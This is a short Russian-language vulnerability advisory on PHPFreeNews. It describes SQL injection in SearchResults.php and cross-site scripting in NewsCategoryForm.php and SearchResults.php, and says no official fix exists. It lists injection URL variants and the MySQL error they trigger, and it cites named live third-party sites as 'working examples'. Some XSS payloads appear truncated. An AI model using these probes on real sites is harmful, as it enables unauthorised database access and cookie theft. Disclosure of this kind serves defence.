Уязвимость в скрипте: SearchResults.PHP
Описание:
Уязвимость вызвана с недостаточным контролем входных данных скриптом SearchResults.PHP, и как следствие успешная атака может привести к раскрытию или модификации информации в базе данных уязвимого приложения.
Рабочие примеры:
1. http://balkanakcija.com/phpfn/SearchRes…
Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in /home/balkanak/public_html/phpfn/Inc/ListingFunctions.php on line 86
Query failed : You have an error in your SQL syntax. Check the manual that corresponds to your MySQL server version for the right syntax to use near '''' IN BOOLEAN MODE) ORDER BY Sticky DESC, Priority, PostDate
2. Варианты:
/SearchResults.php?Match=1&NewsMode=1&SearchNews=Search&CatID='
/SearchResults.php?Match=%27&NewsMode=1&SearchNews=Search&CatID=0
/SearchResults.php?Match=1&NewsMode=1&SearchNews=Search&CatID=%27
Межсайтовый скриптинг в PHPFreeNews.
Уязвимость в скриптах: NewsCategoryForm.php и SearchResults.php
Описание:
Уязвимость связана с недостаточной фильтрацией входных данных. Успешная атака позволяет раскрыть информацию о других пользователях, путем внедрения вредоносной ссылки, и кражи cookie-файлов.
Рабочие примеры:
http://equateur.americas-fr.com/news/SearchR…
Варианты:
/NewsCategoryForm.php?NewsMode=">&CatID=0
/SearchResults.php?Match=1&NewsMode=1&SearchNews=Search&CatID='>
/SearchResults.php?Match=1&NewsMode=">&SearchNews=Search&CatID=0
/SearchResults.php?Match=">&NewsMode=1&SearchNews=Search&CatID=0
Решение:
На данный момент официального решения не существует.